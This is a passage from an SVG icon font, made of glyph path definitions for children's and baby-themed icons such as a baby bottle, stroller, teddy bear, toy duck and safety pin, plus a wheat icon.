5-9 14-7 23 4 18 16 30 31 42 2 2 5 1 5-2 3-20 3-37-7-53z m-19 161c5 5 11 10 17 14 3 2 6 2 8 1s1-5-1-7c-5-7-9-13-14-19-1-1-3-1-5-1-3 1-6 3-6 7 0 2-1 4 1 5z m-32 43c1 3 3 5 5 6 6 2 12 3 19 4 3 0 6-1 7-2s-2-5-4-7c-5-4-10-8-15-10-3-1-6 1-10 2-3 1-4 4-2 7z m-16-97c3 1 5-1 4-4-5-20-12-37-29-46-4-2-10-2-15-1-3 0-6 3-7 6 0 6-1 12 1 16 9 17 26 24 46 29z m-109 38c-6 9 1 17 9 22 16 10 33 10 52 7 3 0 4-3 2-5-11-16-23-28-42-31-7-1-17 2-21 7z m697 117h-50c-4 0-6-3-6-6 2-57-12-110-36-161-70-144-227-231-381-211-166 21-295 138-328 298-5 24-5 49-6 74-1 3-3 6-7 6h-50c-3 0-5-3-5-6v-35c0-3 0-8 1-12 5-24 9-49 16-74 47-165 194-290 365-310 2-1 4-1 6-2 3-1 8-1 11-1h76c4 0 9 0 12 1 25 5 50 9 74 16 165 47 290 194 311 365 0 2 0 4 1 6 1 3 2 8 2 11v35c0 3-3 6-6 6z" />
<glyph glyph-name="wheat" horiz-adv-x="1000" unicode="&#xeb9c;" d="M164 364c29-45 73-63 124-70 21-3 42-13 59-24 18-12 24-33 16-54-8-21-25-30-48-29-27 1-50 14-66 33-22 25-40 53-60 80-3 5-7 10-10 15-5 16-10 33-15 49z m43-138c27-46 70-64 121-71 21-3 42-12 60-23 21-12 27-37 20-57-8-20-29-34-53-27-22 6-45 16-61 31-23 23-40 52-60 79-3 5-7 10-10 15-6 18-11 36-17 53z m-129 409c28-46 71-64 122-71 20-2 40-11 58-21 22-13 29-38 20-59-8-20-30-34-53-26-25 8-51 21-68 40-25 26-43 58-63 88l-16 49z m42-133c29-47 73-64 124-71 20-3 40-12 57-22 21-13 27-38 19-57-9-21-29-35-53-27-25 8-51 21-68 40-25 25-43 58-63 88-5 16-11 32-16 49z m86 286c27-36 54-72 79-109 10-13 15-30 19-47 6-24-3-41-22-50-24-11-49-8-59 14-12 27-21 57-24 86-3 34 1 69 3 104 0 0 4 2 4 2z m231-194c16-65 26-129 0-192-6-15-20-29-34-39-14-11-34-12-47 1-10 12-22 32-19 43 7 24 22 45 36 66 15 21 35 39 48 62 10 16 11 37 16 59z m-41 130c15-54 22-110 7-166-5-21-19-41-33-57-15-15-36-18-56-5-20 14-27 34-18 55 9 20 23 38 37 56 13 18 32 32 42 52 10 19 14 43 21 65z m363-651c-28-39-59-74-106-85-9-2-20-1-27 3-9 6-17 16-20 26-3 13 4 27 16 31 17 5 35 8 52 7 30-3 59-3 85 18z m-181 127c-10-34 1-63 16-91 7-13 11-28 13-43 2-17-8-30-22-35-14-4-29 2-37 17-4 6-7 13-8 20-6 49 13 91 38 132z m-99 255c17-57 25-114 8-171-6-20-21-39-36-55-14-14-34-14-51-3-19 12-28 31-20 50 10 23 24 46 41 63 41 43 51 60 58 116z m208-88c-10-35 4-64 19-93 6-11 10-24 11-37 2-17-8-32-22-37-14-4-29 2-37 17-4 6-7 13-8 19-6 49 13 91 37 131z m-55-84c-8-32 2-59 17-87 6-13 11-27 14-42 3-17-8-32-22-37-14-4-30 1-37 17-5 10-9 21-9 32-1 43 14 81 37 117z m109 167c-10-30-2-56 11-82 7-14 14-28 17-42 5-22-5-39-23-44-16-5-35 5-40 26-4 16-5 34-2 50 4 33 17 64 37 92z m-218-136c18-65 27-130 0-194-5-10-13-20-22-27-17-15-37-20-57-7-19 12-28 34-18 57 7 18 18 35 31 48 35 35 67 69 66 123z m398 10c-22-34-49-63-86-79-12-6-27-7-41-6-14 2-24 12-26 28-1 16 7 28 21 34 11 4 23 5 35 5 10 1 21-1 31-2 24-2 47 4 66 20z m-53-83c-26-37-55-68-98-82-17-6-35-5-47 11-5 7-7 22-5 31 7 19 25 24 42 25 10 0 19-1 28-2 29-4 55-1 80 17z m-54-83c-2-3-3-7-5-9-24-30-50-58-85-71-12-4-27-4-40-2-12 1-20 11-22 25-2 14 3 26 15 32 12 5 26 7 39 9 10 1 20-2 31-3 24-2 46 4 67 19z m60 295c-5-41-12-80-34-115-12-19-26-23-42-14-18 11-22 29-11 49 20 36 53 59 87 80z m-473-415c24 7 43 13 65 20 4-14 8-29 11-43 6-27 13-53 17-80 1-7-6-21-12-22-9-2-26 1-29 7-19 38-34 77-52 118z m162-19c13-10 25-18 38-27-18-24-36-48-55-71-3-3-13-4-16-1-5 4-10 14-9 18 13 27 28 53 42 81z" />
<glyph glyph-name="baby-backpack" horiz-adv-x="1000" unicode="&#xeb9d;" d="M272-94c-56-25-112-9-151 45-42 57-64 121-66 191 0 17 4 33 11 48 2 5 3 9 0 14-37 58-54 123-60 190-9 87-2 172 27 255 17 49 41 95 81 129 65 56 147 49 204-14 14-15 26-32 36-51 4-7 7-12 17-9 10 2 8 9 8 15 0 61 38 113 92 127 77 20 150-32 156-111 1-8 2-15 2-22-1-7 0-11 8-13 8-2 12 0 16 7 13 24 29 45 50 62 63 55 145 50 202-11 41-45 64-100 77-158 28-124 21-246-30-364-1-2-2-5-3-7-8-13-18-26-23-40-4-14 9-26 10-41 2-32-2-63-12-94-13-46-35-89-68-126-37-40-81-51-133-34-10 4-12 6-5 16 29 42 42 89 38 140-4 61-43 106-107 125-45 13-91 16-136 17-57 1-115 2-171-12-61-16-102-57-110-112-8-55 4-105 34-152 1-3 3-6 6-10z m523 582c4-16 8-33 11-50 13-63 18-125 11-189-2-15 1-18 16-16 4 1 7 4 9 7 6 9 12 18 17 28 29 59 39 121 41 185 1 66-8 130-36 191-9 20-21 39-38 53-18 16-35 16-54 3-16-12-26-27-36-44-4-6-4-10 1-15 7-9 13-20 17-31 23-61 0-125-58-163-42-27-89-39-138-45-7-1-8 2-8 7-1 15-5 27-17 37-15 12-31 16-50 9-19-7-30-22-32-42 0-6 1-11-8-9-47 7-93 19-133 45-75 48-91 129-40 201 3 5 3 8 1 12-7 12-14 24-23 34-29 31-53 30-80-1-17-18-29-39-37-62-40-107-42-216-8-326 7-20 16-39 28-57 6-9 15-7 22-6 7 2 4 9 3 14-4 50-1 99 8 148 6 32 13 63 24 96 10-55 43-88 88-111 45-23 93-34 143-39 6-1 11-1 11-10 2-28 22-47 48-47 26-1 46 16 50 44 2 8 4 11 12 11 29 2 58 6 87 15 67 19 126 48 148 123z m-291 229c14 0 28-1 42-1 4 0 8-1 8 6 2 22-14 47-37 52-33 9-63-15-64-50 0-6 4-7 9-7 14 0 28 0 42 0z m-15-867c-79 4-143 35-185 104-18 31-25 65-21 101 4 37 27 58 61 70 25 9 52 12 79 13 67 3 135 4 202-11 15-3 29-9 41-17 31-19 45-54 37-96-15-84-69-132-147-156-22-6-44-9-67-8z" />
<glyph glyph-name="baby-cloth" horiz-adv-x="1000" unicode="&#xeb9e;" d="M762 762c10 43 0 70-38 88h-28c-11-100-81-161-187-165-129-4-200 48-223 165h-27c-37-20-43-46-33-89 18-75 37-156 11-230-43-120-28-242-33-363-1-38 5-54 50-57 84-6 170-110 150-189-17-71 16-72 64-72 27 0 55 1 82 2 31 2 45 10 39 50-16 108 49 192 154 211 15 3 35-4 35 21-1 105 16 214-8 313-27 108-32 210-8 315z m-567-63c-6 25 6 66-20 74-28 9-47-28-68-47-118-104-118-104-19-225 15-17 24-47 57-35 28 10 47 27 51 57 4 27 7 54 10 82-3 31-4 63-11 94z m779-63c-3 3-6 7-9 10-48 45-96 89-158 146-15-92-33-169-19-250 6-36 17-77 54-75 67 4 79 79 121 116 15 13 31 30 11 53z m-765-568c51-64 95-119 141-177 36 94-30 181-141 177z m430-168c36 44 70 86 104 128 8 10 15 21 28 40-104 0-162-76-132-168z m-13 888c-88-25-177-18-279 5 95-91 202-90 279-5z" />
<glyph glyph-name="baby-milk-bottle" horiz-adv-x="1000" unicode="&#xeb9f;" d="M672-41c-83 113-167 226-250 339-24 32-34 67-12 103 30 47 92 45 129-4 72-97 143-194 215-291 8-10 12-24 26-28-16 39-46 70-69 104-54 77-112 152-164 231-35 52-27 80 18 112-1 1-2 3-3 3-50 32-114 42-150 97-8 12-17 1-23-4-49-36-97-72-146-107-13-10-13-16-4-28 24-30 30-67 34-103 3-24 2-49 14-71 40 38 72 39 110-9 99-123 194-248 283-379 15-22 25-47 13-74h15c41 12 82 26 112 59-82-25-96-20-148 50z m199 158c-83 115-166 229-250 344-6 8-14 16-22 23-13 11-27 23-45 10-14-10-11-27-6-43 7-20 18-38 30-55 76-104 151-209 227-313 14-19 31-36 48-52 7-8 18-17 31-9 11 6 15 17 14 28 0 27-13 48-27 67z m-263-120c-74 98-149 197-224 294-15 19-37 43-63 25-28-19-6-46 7-65 88-123 177-245 271-363 12-15 27-29 48-32 29-3 39 12 26 43-15 36-41 66-65 98z m-186 679c-14 18-24 41-45 53-18 12-34 2-50-9-47-36-95-70-142-106-52-37-52-50-13-100 11-14 18-19 34-7 67 51 135 100 202 151 6 4 14 7 14 18z m-249-48c48 35 89 66 135 100-59 24-111 46-134 108-8 20-37 17-55 1-19-17-25-39-3-58 21-18 41-37 46-66 4-26 7-52 11-85z m354-245c-32 43-75 47-101 9-21-30-8-58 10-83 88-120 176-239 264-358 10-14 22-26 38-34 37-16 79 9 80 53-1 14-9 30-20 45-20 28-40 55-60 83-71 95-140 190-211 285z" />
<glyph glyph-name="baby-trolley" horiz-adv-x="1000" unicode="&#xeba0;" d="M846 524c-225-1-449 0-674-1-7 0-16 4-23-5 8-7 22-6 26-18 5-43 5-43-37-33-4 1-3-5-3-9-5-1-11 8-14-3-14-62 5-145 85-171 23-8 46-7 69-7 158 0 317 0 475-1 62 0 75 7 96 64 5 15 8 31 11 47 5 36 8 72 15 107 6 26-2 30-26 30z m-418-199c-50 1-100 2-151 4l1 12h148c5 0 10-1 11-7 1-7-3-10-9-9z m61-18c-19 3-41 1-40 24 0 24 22 23 38 23 15-1 38 1 37-23 0-25-23-19-35-24z m58 18c-6 0-11 1-10 8 1 10 10 7 16 7h141l1-15h-148z m-6 218c79 90 153 175 230 264-9 2-14 4-19 5-85 13-170 25-255 37-29 5-31-14-26-33 22-89 45-178 70-273z m123-405c-77 1-143-65-144-143-1-78 65-144 143-145 78-1 144 65 145 143 0 78-65 144-144 145z m-7-247c-11-8-22-3-27 11-18-9-26 0-32 15-18 3-27 11-17 31-14-5-18 4-19 15-2 13 8 13 17 13 7 1 14 1 19 6-9 0-18 0-27-1-9-1-15 2-15 12 0 13 7 15 17 14 18-3 36-5 54-7l-1-16c13 1 2-10 6-14 4-4 1-8 1-13l14 5c11-8 20-64 10-71z m-11 135c-6-3-8 5-12 5l-1-13c-4-5 5-14-6-17v0c-14 9-31 6-47 11-8 2-20-1-18 13 1 11 6 19 19 17-12 20 2 26 18 30 4 17 16 20 31 17 5 11 16 14 25 10 8-3 6-15 4-21-4-17 15-41-13-52z m102-80c6-18-2-26-19-30-9-17-19-28-35-6 2-13-1-22-15-22-16-2-14 10-15 20 0 15 0 29 0 44 0 13 8 8 14 5 0 5-1 13 8 7-1 7 3 11 10 11 10 15 24 4 36 6 4-4 10-4 15-5 8-1 19 1 19-9 0-10-2-22-18-21z m3 66c-9 0-17-3-23-9 14 2 29 9 42-2 2-2 2-11 0-14-11-13-26-2-38-5-7 12-31-4-31 18-9 2-5 9-5 15-10-1-6 7-7 11-9-4-14-5-11 8-5-5-11-13-13 0-2 14-1 28 0 42 0 10-4 24 13 24 17 0 18-11 16-25 14 24 25 17 35-3 19-5 28-14 16-34 15 10 19-3 21-13 2-11-7-13-15-13z m-414 126c-78 1-143-63-144-142 0-81 62-145 141-146 79-1 144 63 144 142 1 81-61 145-141 146z m-4-115c-7 7-10 10-13 14-1-6 3-14-6-17-1-8-8-6-12-7l-2-7 1-24-9-17c5 4 10 6 16 3 14-1 13-10 12-19l13 17c0-26 0-47 0-68 0-7-2-13-10-11-10 2-22 2-19 17-9-9-19-8-26 0-13 14 9 19 8 30-11-1-12-22-27-14-10 6-15 16-5 26-24-1-22 14-18 30-8 8-11 21-4 27 11 9 26 2 39 1-6 2-12 6-18 8-8 2-20-2-19 12 0 12 6 20 20 18-10 10-5 19 4 24 17 12 17-13 28-15-3 7-6 14-11 20-3 5-2 9 3 13 8 7 17 8 25 0-1 17 13 17 22 16 12 0 7-12 8-19 0-18 0-36 0-58z m96-10c-10-1-20-1-27-11 38 9 45 5 38-19-1-2-5-2-7-4 10-9 6-20 0-28-7-11-15 2-23 1 2-9 22-12 7-28-13-14-17 2-25 4-2-8 13-14 2-23-8-7-17-11-26-1 1-17-13-17-22-16-12 0-7 12-7 19-1 18-1 36-1 53 9 2 8-8 14-9 0 6-5 14 5 18 1 7 7 5 12 7l2 6 0 18-2 12c-5 2-11 0-12 8-10 5-6 13-5 20l-14-17c0 23 0 41 0 60 1 7-4 18 9 18 11-1 24-2 21-19 7 9 14 10 24 3 14-10-2-17-1-25 9 2 14 19 27 3 14-18-12-19-12-31 7 3 14 8 22 9 8 0 8-10 10-16 2-8-3-12-9-12z m181 589c-15-16-29-33-43-49l4-6c103 29 206 59 312 89-31 52-61 102-90 152-11 19-17 5-23-2-54-62-107-123-160-184z m47-427c-38 2-76 6-115 20 17 13 31 23 45 34 15 12 29 24 46 38-19 7-31 3-43-6-86-69-79-67-163-1-13 10-25 14-44 6 32-25 60-47 92-72-47-13-92-19-137-20-60-2-107-30-142-78-5-6-13-13-4-21 10-7 14 3 18 9 66 90 201 84 258-9 3-6 7-17 17-10 9 7 1 15-2 21-17 29-42 50-70 69 60 21 116 35 176 0-24-14-46-32-62-55-6-7-18-16-6-25 10-8 14 6 20 13 69 85 188 81 252-8 5-8 7-24 20-16 10 7 0 18-5 26-36 54-87 81-151 85z m177 434c-76-22-153-44-229-66l2-6c80 0 160 2 240-1 28 0 35 9 35 35 0 52 2 52-48 38z" />
<glyph glyph-name="baby" horiz-adv-x="1000" unicode="&#xeba1;" d="M629 406c-15 35-51 55-97 55h-226c-122 0-225-143-86-280 1-2 0-4-2-4h-103s-52 0-52-79c2-52 42-60 49-60h210s52 0 55 63l0 2c0 10 0 58 0 58 0 6 5 14 12 14h164c3 0 5-2 5-4l39-88c14-36 42-62 89-45 45 16 47 51 39 76l-96 292z m157 262c-84 0-152-68-152-152 0-84 68-152 152-152s152 68 152 152c0 84-68 152-152 152z" />
<glyph glyph-name="candy" horiz-adv-x="1000" unicode="&#xeba2;" d="M561 617c-169-1-334-167-333-336 1-110 72-182 181-185 174-5 341 158 342 332 0 119-71 190-190 189z m7-434c-33-23-50 8-71 22-62 45-114 101-164 158-30 35-32 63 1 95 14 12 26 26 38 40 40 45 77 52 126 5 53-51 106-103 151-161 10-13 17-28 25-42-23-51-62-86-106-117z m430 392c-9 73-38 92-111 74-15-4-29-9-36 7-9 23 14 24 26 34 11 8 37 4 32 28-4 19-18 33-37 38-25 7-29-17-41-29-9-11-20-24-34-15-14 10-8 25 0 37 16 26 41 54-5 72-40 17-83 53-126 6-49-53-33-165 27-205 31-21 61-46 72-82 15-50 46-64 79-57 31 2 47 3 63 5 50 8 100 19 91 87z m-688-495c-35 11-62 39-83 71-18 29-24 71-76 63-38-6-79 0-114-21-61-36-28-82-13-127 17-47 43-39 74-15 11 8 26 16 37 4 15-18-2-30-15-38-30-20-36-41-7-66 36-32 39 6 50 25 7 12 11 29 29 23 21-8 13-24 8-40-6-23-33-48-8-70 31-27 71-45 114-37 36 7 47 41 54 73 4 20 4 41 8 77 6 32-7 63-58 78z" />
<glyph glyph-name="holding-hands" horiz-adv-x="1000" unicode="&#xeba3;" d="M332 678c-19 1-37 0-54 2-23 3-44 10-64 21-12 8-23 16-32 27-6 7-10 16-13 26 0 2 0 4 1 5 4 5 4 9 3 14-1 3 0 4 3 4 24 6 49 6 73 4 18-1 35 1 52 4 14 3 28 6 42 7 32 2 64 9 95 14 37 7 71 19 106 31 34 11 68 15 103 12 34-2 67-11 99-21 25-8 49-16 70-32 23-18 39-40 51-66 11-21 18-44 28-65 9-18 24-31 39-44 12-10 24-19 35-30 24-25 32-54 27-87-5-37-20-69-37-102-9-19-20-38-31-57-10-15-20-31-31-46-17-21-29-45-42-69-17-29-31-60-52-87-24-30-43-64-64-96-11-16-23-32-36-47-20-23-35-50-51-77-7-12-15-23-24-34-8-10-17-20-29-27-10-7-21-13-35-12-6 0-11 5-13 10-8 16-9 32-4 49 10 26 24 50 39 73 10 16 19 32 29 48 15 23 26 49 38 74 10 22 22 43 31 66 3 8 5 15 6 23 1 2 1 6-2 7-3 2-5-1-7-3-3-3-5-7-8-10-13-23-29-44-42-67-13-24-30-44-49-63-28-25-50-55-71-86-19-29-41-55-63-80-10-12-22-22-38-26-7-2-15-4-23-4-10 0-17 5-22 14-14 25-10 49 7 71 17 21 34 42 50 63 21 28 44 54 62 84 12 19 22 40 35 59 7 10 15 21 23 31 8 11 15 22 22 34 2 4 4 7 1 11-4 4-8 3-12 1-10-6-18-14-25-22-16-19-30-38-44-58-18-24-35-50-56-72-15-14-29-29-43-44-33-35-61-74-90-114-9-13-18-27-32-37-13-8-28-14-44-9-12 3-20 12-25 23-8 18-6 34 3 50 18 35 41 67 65 99 19 24 37 49 54 75 5 9 13 14 21 20 12 10 23 21 33 33 13 15 29 26 45 38 16 11 32 23 48 36 15 13 33 20 51 26 10 4 20 6 30 10 13 4 26 4 40 3 34-4 68-8 101 5 16 7 33 7 50 9 15 3 30 1 45 5 13 4 26-1 39 0 5 1 9 1 13 5 2 4 3 7 1 11-2 6-6 11-10 14-13 11-27 16-43 17-22 1-44 2-66 6-1 0-3 1-4 1-18 7-18 11-11 24 9 19 22 35 39 48 17 13 32 26 49 38 33 24 64 51 97 74 11 8 17 20 17 34 0 6-4 10-11 11-13 4-24-1-34-9-21-16-43-31-66-44-16-9-31-21-47-30-4-3-9-6-14-7-5-2-8 1-10 4-3 4-3 8 0 11 14 13 27 27 41 40 13 12 26 24 37 38 16 19 36 35 50 55 6 7 9 15 5 25-5 15-16 17-29 9-10-6-18-16-25-24-12-15-27-26-41-39-9-7-18-13-26-21-12-12-23-24-34-36-3-2-5-4-8-6-2-2-5-3-8-1-2 1-2 4-1 6 1 11 6 20 11 29 3 5 7 9 9 14 14 30 35 57 54 84 3 4 6 8 8 12 4 9 2 18-3 25-4 6-14 7-21 3-7-4-12-9-16-15-11-13-20-26-29-41-7-11-15-21-24-31-11-11-20-25-27-40-4-8-10-16-17-23-1-1-2-2-4-3-2-1-4-2-6-1-2 1-3 4-2 7 1 4 2 8 4 12 5 12 9 25 13 37 3 8 7 15 10 22 6 13 10 26 17 39 5 8 4 16 1 25-4 9-11 11-18 4-10-8-19-16-24-28-9-22-22-42-34-63-5-7-8-16-12-23-11-21-24-41-37-60-17-24-33-48-47-74-7-14-14-29-21-43-11-21-29-35-47-49-26-20-54-36-83-51-6-3-12-6-18-11-5-5-12-8-18-11-7-5-14-9-22-14-9-6-19-12-30-16-35-12-66-30-98-48-19-10-38-21-56-32-15-8-31-14-48-10-10 2-20 5-29 10-10 5-14 15-12 27 4 29 19 50 43 66 27 18 55 32 84 48 14 7 28 15 41 25 34 25 71 45 108 64 17 10 34 19 50 30 28 20 58 39 84 61 19 17 33 37 48 57 13 20 23 41 29 64 1 5 0 8-3 12-12 14-29 20-47 22-37 6-74 7-109 7z" />
<glyph glyph-name="infant-nipple" horiz-adv-x="1000" unicode="&#xeba4;" d="M556 195c-32 25-62 16-71-22-6-26 18-33 30-46 26-28 46-57 33-96-11-35-38-51-73-55-80-10-228 71-262 143-14 30-15 61 4 89 20 30 51 35 84 30 15-2 30-7 45-11 21-5 31 7 38 25 6 15 14 30-6 44-66 49-199 27-241-44-48-80-54-164 0-245 68-101 167-150 271-157 110 0 196 62 226 148 22 63-10 143-78 197z m128 175c28-1 32 6 28 33-13 89 14 162 90 215 52 37 67 84 49 138-20 58-72 95-133 94-66-1-115-39-119-104-8-102-54-171-152-203-17-6-19-12-9-27 58-89 136-142 246-146z m189-36c-37 6-74 12-111 11-158-1-284 55-366 197-21 37-52 68-79 101-7 8-16 22-27 15-15-9-3-24 3-33 32-52 64-104 104-151 20-24 36-50 21-81-10-21 7-22 16-27 41-24 82-46 123-69 24-13 45-30 67 5 9 14 30 11 48 11 46-1 93-13 130-10h70c11 0 28 1 29 12 2 16-17 18-28 19z m-257-121c11 20-1 33-17 42-71 39-142 78-213 118-18 10-36 14-47-8-11-21 5-31 20-40 32-19 63-38 95-56-10-2-20-1-29-4-28-11-42-30-33-60 10-30 34-39 61-29 29 9 36 33 27 62-3 7-7 15-10 23 34-18 68-36 102-54 16-9 33-14 44 6z" />
<glyph glyph-name="kids-scooter" horiz-adv-x="1000" unicode="&#xeba5;" d="M368 343c12 0 11-15 16-23 1 0 1-1 1-2 7-8 3-33 26-17 4 2 6-4 8-6 10-13 17-26 16-44-1-37 0-74 0-111h0c0-41-1-82 0-123 0-22 15-40 35-42 17-2 37 11 41 29 3 8 2 18 2 27 1 76 0 153 1 230 0 19-3 36-14 51-8 11-11 22 1 32 9 10 5 18-1 28-13 23-42 43-38 67 4 24 28 44 43 66 3 3 6 7 8 11 9 15 17 17 29 2 24-31 51-60 75-91 13-15 27-19 42-8 14 11 12 27 1 41-52 69-105 138-158 206-26 32-50 37-88 21-73-30-146-61-218-91-21-9-28-22-21-38 6-15 22-19 42-10 26 11 53 23 79 34 12 5 26 18 38 10 13-9 1-25-1-38-6-47-10-95-50-130-13-11-22-26-34-40-4-4-8-10-1-15 12-10 11-19 1-30-10-13-21-9-32-3-35 18-71 36-106 53-20 10-38 5-47-12-8-16-3-35 15-45 54-29 107-56 161-85 15-8 27-5 38 9 10 14 22 27 32 42 5 6 10 12 18 9 14-5 19 2 23 13 4 9 6 22 17 23z m513-314c-18 6-23 17-27 33-23 90-47 180-69 271-7 28-24 46-53 52-32 6-63 10-94 16-13 3-24 1-26-13-3-15 6-20 19-22 30-5 58-12 88-16 19-2 27-12 32-29 23-90 47-180 72-270 4-12 1-16-10-21-39-15-58-45-60-74 0-58 33-99 77-104 49-7 93 21 106 66 12 45-10 94-55 111z m-35-121c-19-1-34 15-34 34-1 20 14 36 33 36 20 0 35-15 35-35 1-18-15-35-34-35z m-603 129c-51 1-95-43-95-94 0-51 41-92 93-93 51-1 93 40 94 91 0 52-41 95-92 96z m0-129c-18 0-36 15-36 34-1 19 15 35 36 35 18 0 32-14 33-33 0-19-15-36-33-36z m273 788c41 0 76 35 77 75 0 43-35 79-78 79-43 0-76-34-77-77 0-43 35-78 78-77z m209-743c-8 5-17 4-26 4-52 0-104 0-155 0v0h-162c-15 0-31-3-32-21 0-19 17-23 32-24 3-1 5-1 7-1 104 0 208 0 312 0 9 0 17 2 24 6 16 8 15 26 0 36z m112 322c23-8 26-6 27 18v31c0 12-1 23 0 34 2 19-9 20-22 17-22-5-38-25-39-47-2-26 10-44 34-53z" />
<glyph glyph-name="safety-pin" horiz-adv-x="1000" unicode="&#xeba6;" d="M536 64c0 24 0 49-6 71-6 19 1 30 13 43 56 54 111 110 166 165 5 4 6 7 2 13-39 67-39 134-1 202 1 1 2 2 3 5-10-5-19-10-28-14-81-38-185-9-235 65-3 5-3 7 1 12 53 53 105 106 159 158 66 63 144 81 230 54 83-26 136-85 154-171 17-78-3-148-59-205-127-129-255-256-382-383-5-5-10-11-15-16l-2 1z m234 478c43 0 78 34 79 78 0 43-36 78-79 78-42 1-78-34-78-77 0-44 34-79 78-79z m-526-234c48-4 92-20 129-51 57-46 86-106 85-179-1-132-110-234-241-228-111 6-204 94-215 204-8 74 16 138 68 190 96 96 193 193 289 289 23 23 57 16 66-13 4-15 0-29-11-40l-156-155c-5-5-10-10-16-14l2-3z m-168-229c2-87 71-154 156-153 85 2 152 72 151 158-2 84-73 150-158 148-82-1-150-71-149-153z" />
<glyph glyph-name="teddy-bear" horiz-adv-x="1000" unicode="&#xeba7;" d="M771 234c-29 0-58 1-87 0-74-3-133-35-177-94-5-7-7-7-12 0-48 63-112 95-192 95-54 0-109-1-164 0-49 0-86 29-97 75-14 56 29 114 86 116 40 1 79 0 118 0 12 0 12 0 7 11-8 20-14 40-17 61-1 8-5 10-12 13-71 21-113 69-125 141-12 68 22 137 81 173 68 41 155 30 211-26 6-6 11-7 18-4 61 22 122 22 182 0 8-3 13-2 19 4 49 47 107 63 172 42 65-20 106-66 119-133 17-89-37-174-125-198-7-2-10-5-11-12-3-22-10-43-19-63-3-7-1-9 6-9 37 1 74 1 111 0 57 0 98-41 98-95 0-54-42-96-98-96-30-1-61 0-92 0v-1z m-269 373c-44-1-83-14-116-42-58-51-62-136-7-191 60-61 163-67 230-13 65 53 70 141 11 198-33 33-74 47-118 48z m-329 67c2-36 20-65 53-83 7-4 10-3 11 5 13 60 42 110 88 150 6 5 4 7-1 10-32 21-66 23-100 5-33-17-50-47-51-87z m557 99c-17 1-34-5-50-15-11-6-11-6-1-15 44-39 72-88 84-146 2-9 5-10 12-6 40 21 60 65 50 108-10 43-48 73-95 74z m-421-616c84 0 153-69 153-152 0-86-69-155-154-155-84 0-153 70-153 154 0 85 68 153 154 153z m384 0c87-1 155-70 154-156-2-83-73-152-154-151-88 1-155 71-154 159 1 81 72 149 154 148z m-193 283c-31 1-59 10-80 35-21 26-21 58 0 84 36 43 118 46 156 4 29-31 27-73-7-100-20-16-43-23-69-23z" />
<glyph glyph-name="toy-ball" horiz-adv-x="1000" unicode="&#xeba8;" d="M500 850c280-1 500-227 500-500 0-279-226-501-502-500-277 1-500 227-498 503 2 276 225 496 500 497z m145-452c0 8 0 16 1 25 0 5-2 7-8 8-39 5-72 22-98 52-4 5-7 4-12 1-31-18-60-37-89-57-84-58-164-121-235-195-24-26-47-53-63-85-5-8-4-15 1-23 38-58 87-106 147-141 55-32 114-49 177-56 28-3 48 4 65 28 26 37 45 78 60 121 34 105 49 212 54 322z m-478 211c8 4 16 8 24 11 58 25 118 26 179 20 48-5 93-17 138-33 6-2 9 0 12 5 8 17 21 31 38 41 15 10 32 16 50 18 4 0 10-1 7 6-9 29-21 57-40 80-7 9-15 13-27 14-7 0-13 1-20 2-93 4-179-17-257-67-40-26-75-58-104-97z m734-394c1 4 3 8 4 13 16 53 22 108 16 164-7 75-33 143-77 204-5 8-12 11-21 11-19 0-38-4-57-9-8-2-11-5-7-14 16-37 15-73-9-107-3-5-2-7 2-10 20-18 40-37 57-57 48-57 86-118 92-195z m-180 328c0 2-1 6-1 11-10 49-65 84-114 71-35-8-53-39-43-74 13-47 71-78 117-63 25 8 41 28 41 55z" />
<glyph glyph-name="toy-cat" horiz-adv-x="1000" unicode="&#xeba9;" d="M388 572c-94-43-129-136-81-230 66-127 183-174 317-188 40 5 79 10 114 27 87 41 121 126 86 215-58 151-288 244-436 176z m191-277c-33 1-67 13-77 49-7 23 19 26 34 33 33-9 69-15 79-52 7-26-19-31-36-30z m69-174c6 27-15 19-26 19-59-2-113 14-166 38-17 8-30 12-35-13-11-56-46-100-73-148-16-29-33-57-38-82-4-47 23-63 52-75 34-12 48 11 59 38 14 36 26 76 78 71 51-4 53-41 60-79 7-39 35-48 69-34 32 13 30 43 26 69-8 65-20 130-6 196z m-351 104c-19 31-40 61-59 93-19 34-34 70-44 108-48 172 42 307 216 322 9 1 17 0 25 3 17 7 32 17 35 39 3 24-8 40-28 50-23 10-48 11-73 9-106-9-221-129-233-247-16-155 55-275 161-377z m97-11c-12 9-21 15-38 6-83-39-112-164-51-240 37 62 74 117 98 178 7 19 11 40-9 56z m452 340c-22 16-50 8-76 0-27-8-36-18-11-39 32-27 55-61 77-96 21 18 18 38 23 55 9 28 15 60-13 80z m-441 44c24 7 38 7 46 15 27 25 52 57 80 1 3-4 21-4 29 0 13 5 6 16 3 26-19 70-61 81-113 29-18-18-35-37-45-71z" />
<glyph glyph-name="toy-duck" horiz-adv-x="1000" unicode="&#xebaa;" d="M855 313c-14 10-30 20-44 30-68 49-78 89-45 165-52 15-100 40-138 80-15 15-25 34-14 58 10 20 27 27 49 23 17-3 31 2 44 15 59 64 51 104-26 142-36 18-75 27-115 23-93-10-160-58-191-146-30-85-15-165 50-232 33-34 41-85 21-121-16-27-187-50-209-27-16 17-30 35-44 53-47 58-82 56-121-8-49-81-45-169-33-257 23-173 110-249 283-259 157-9 311 7 466 29 96 13 157 61 172 154 23 139 0 203-105 278z m-311-338c-46-23-96-31-153-31-34-3-73 3-111 16-82 27-123 80-130 167-2 19-11 38-14 57-6 40 14 63 49 49 95-36 192-35 291-37 55 0 103-17 124-76 22-62 3-115-56-145z m128 675c-16 0-34 9-41-13-6-16 3-28 13-40 12-15 24-10 41-7 68 12 124 61 194 61 41 0 47 20 46 45-2 52-15 62-57 44-25-12-51-19-75-7-30 14-40 0-51-24-14-30-30-60-70-59z m186-18c-8 0-16-4-23-7-48-20-95-43-155-52 52-46 98-54 149-18 15 10 32 17 48 25 18 10 50 15 43 38-8 25-40 14-62 14z m-397-453c-92 0-183-1-271 35-27 10-39-2-35-32 7-49 33-75 88-83 22-4 46-3 65-18-49-9-94 3-146 25 32-80 106-77 164-100l-5-12c-29 5-58 11-91 16 76-63 262-63 330-2 33 28 36 64 24 103-15 48-52 69-123 68z" />
